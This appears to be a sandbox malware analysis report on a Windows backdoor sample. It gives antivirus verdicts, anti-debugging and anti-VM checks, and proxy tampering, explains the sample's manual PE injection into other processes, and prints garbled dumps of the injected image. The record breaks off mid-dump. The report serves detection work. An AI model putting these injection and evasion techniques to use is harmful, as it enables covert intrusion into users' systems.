14.8
0-day

7b673f65dfb02aea2b7fe950c749c17a953d2b9514aa78c663aac6c002b6bf6b
8e06cec4b5faf0db8f785f458b7dbce5.exe

Analysis duration: 74s
Most recent analysis:
File size: 355.5KB
Static detection: malicious. Dynamic detection: malicious.
Eagle Eye engine
Not detected. No Eagle Eye engine results yet.
Static verdict
Antivirus engines
Engine        Result                                 Scan date  Engine version
McAfee        BackDoor-FDOB!8E06CEC4B5FA             20201211   6.0.6.653
Alibaba       Backdoor:Win32/Simda.ef3da10d          20190527   0.3.0.5
Baidu         Win32.Trojan-Spy.Shiz.b                20190318   1.0.0.2
Avast         Win32:Shiz-JT [Trj]                    20201210   21.1.5827.0
Tencent       Backdoor.Win32.Generic.a               20201211   1.0.0.1
Kingsoft      Win32.Heur.KVMH017.a.(kcloud)          20201211   2017.9.26.565
CrowdStrike   win/malicious_confidence_100% (W)      20190702   1.0
Static indicators
Queries for the computer name (3 events)
Time & API Arguments Status Return Repeated
1619691122.083625
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619691122.631
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619691122.646
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Checks if the process is being debugged by a debugger (18 events)
Time & API Arguments Status Return Repeated
1619686131.278538
IsDebuggerPresent
failed 0 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
Performs some HTTP requests (19 events)
Allocates read-write-execute memory (usually to unpack itself) (50 out of 79 events)
Creates executable files on the filesystem (1 event)
file C:\Windows\AppPatch\svchost.exe
Creates a suspicious process (1 event)
cmdline C:\Windows\AppPatch\svchost.exe
Drops a binary and executes it (1 event)
file C:\Windows\AppPatch\svchost.exe
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5697.tmp
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (4 events)
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619691124.755625
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Repeatedly searches for a process that is not found; you may want to run a web browser during analysis (50 out of 71 events)
Created a process named like a common system process (1 event)
Time & API Arguments Status Return Repeated
1619686132.747538
CreateProcessInternalW
thread_identifier: 2764
thread_handle: 0x000000f4
process_identifier: 2368
current_directory:
filepath: C:\Windows\AppPatch\svchost.exe
track: 1
command_line:
filepath_r: C:\Windows\apppatch\svchost.exe
stack_pivoted: 0
creation_flags: 0 ()
process_handle: 0x000000e8
inherit_handles: 0
success 1 0
Network communication
One or more of the buffers contains an embedded PE file (1 event)
buffer Buffer with sha1: 501b45da2f14fb66a5098cfaa2e35fcd0070956c
Communicates with a host for which no DNS query was performed (1 event)
host 172.217.24.14
Allocates execute permission in another process, indicative of possible code injection (12 events)
Attempts to identify installed AV products by installation directory (1 event)
file C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Checks for the presence of known windows from debuggers and forensic tools (18 events)
Time & API Arguments Status Return Repeated
1619686131.278538
FindWindowA
class_name: OLLYDBG
window_name:
failed 0 0
Checks the BIOS version, possibly for anti-virtualization (1 event)
registry HKEY_LOCAL_MACHINE\SystemBiosVersion
Disables the proxy, possibly for traffic interception (1 event)
Time & API Arguments Status Return Repeated
1619691122.989625
RegSetValueExA
key_handle: 0x000002ac
value: 0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
success 0 0
Creates a thread using CreateRemoteThread in a non-child process, indicative of process injection (13 events)
Process injection Process 2368 created a remote thread in non-child process 2616
Process injection Process 2368 created a remote thread in non-child process 2288
Manipulates memory of a non-child process indicative of process injection (15 events)
Process injection Process 2368 manipulating memory of non-child process 2368
Process injection Process 2368 manipulating memory of non-child process 2616
Process injection Process 2368 manipulating memory of non-child process 2288
Read together with the CreateRemoteThread and WriteProcessMemory events, these allocations show a manual PE mapping rather than a shellcode stub: each target receives one PAGE_EXECUTE_READWRITE region (0x55000 = 348160 bytes for the remote targets), then three writes at region offsets 0x0 (a DOS/PE header: "This program cannot be run in DOS mode", the "Rich" marker and the .text/.data/.reloc section names), 0x1000 (code) and 0x54000 (16-bit values such as 0x31d7, 0x329c and 0x32f1, whose 0x3 high nibble is the IMAGE_REL_BASED_HIGHLOW type of .reloc entries), and finally CreateRemoteThread at offset 0x1360, an entry point inside the freshly mapped image. The first entry targets the sample's own PID 2368, so the image is staged in the injector's own address space before it is copied out. Only the thread in PID 2616 was created (return value 476 is the thread handle); all nine attempts against PID 2288 allocated a fresh region, wrote the same image and then failed at the CreateRemoteThread step, which is why the same payload appears at nine different base addresses in that process.
Time & API Arguments Status Return Repeated
1619691121.817625
NtAllocateVirtualMemory
process_identifier: 2368
region_size: 688128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000000e8
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02290000
success 0 0
1619691122.114625
NtAllocateVirtualMemory
process_identifier: 2616
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000017c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00320000
success 0 0
1619691122.380625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000017c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x004a0000
success 0 0
1619691122.411625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000017c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00500000
success 0 0
1619691122.426625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000017c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02540000
success 0 0
1619691122.473625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000017c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x025a0000
success 0 0
1619691122.505625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f0
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02600000
success 0 0
1619691122.567625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f4
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02660000
success 0 0
1619691122.614625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f4
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x026c0000
success 0 0
1619691122.645625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f4
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02720000
success 0 0
1619691122.676625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f4
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02780000
success 0 0
1619691122.723625
NtAllocateVirtualMemory
process_identifier: 2288
region_size: 348160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000001f4
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x027e0000
success 0 0
Potential code injection by writing to the memory of another process (39 events)
Process injection Process 2368 injected into non-child 2368
Process injection Process 2368 injected into non-child 2616
Process injection Process 2368 injected into non-child 2288
Time & API Arguments Status Return Repeated
1619691121.817625
WriteProcessMemory
process_identifier: 2368
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P*@@.text `.data  @À.reloc`@(@B
process_handle: 0x000000e8
base_address: 0x02290000
success 1 0
1619691121.817625
WriteProcessMemory
process_identifier: 2368
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x000000e8
base_address: 0x02291000
success 1 0
1619691121.833625
WriteProcessMemory
process_identifier: 2368
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x000000e8
base_address: 0x022e4000
success 1 0
1619691122.114625
WriteProcessMemory
process_identifier: 2616
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x0000017c
base_address: 0x00320000
success 1 0
1619691122.114625
WriteProcessMemory
process_identifier: 2616
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x0000017c
base_address: 0x00321000
success 1 0
1619691122.130625
WriteProcessMemory
process_identifier: 2616
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x0000017c
base_address: 0x00374000
success 1 0
1619691122.380625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x0000017c
base_address: 0x004a0000
success 1 0
1619691122.380625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x0000017c
base_address: 0x004a1000
success 1 0
1619691122.395625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x0000017c
base_address: 0x004f4000
success 1 0
1619691122.411625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x0000017c
base_address: 0x00500000
success 1 0
1619691122.411625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
process_handle: 0x0000017c
base_address: 0x00501000
success 1 0
1619691122.426625
WriteProcessMemory
process_identifier: 2288
buffer: ×1œ2ñ253s3ö3”5
process_handle: 0x0000017c
base_address: 0x00554000
success 1 0
1619691122.426625
WriteProcessMemory
process_identifier: 2288
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
process_handle: 0x0000017c
base_address: 0x02540000
success 1 0
1619691122.426625
WriteProcessMemory
process_identifier: 2288
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû 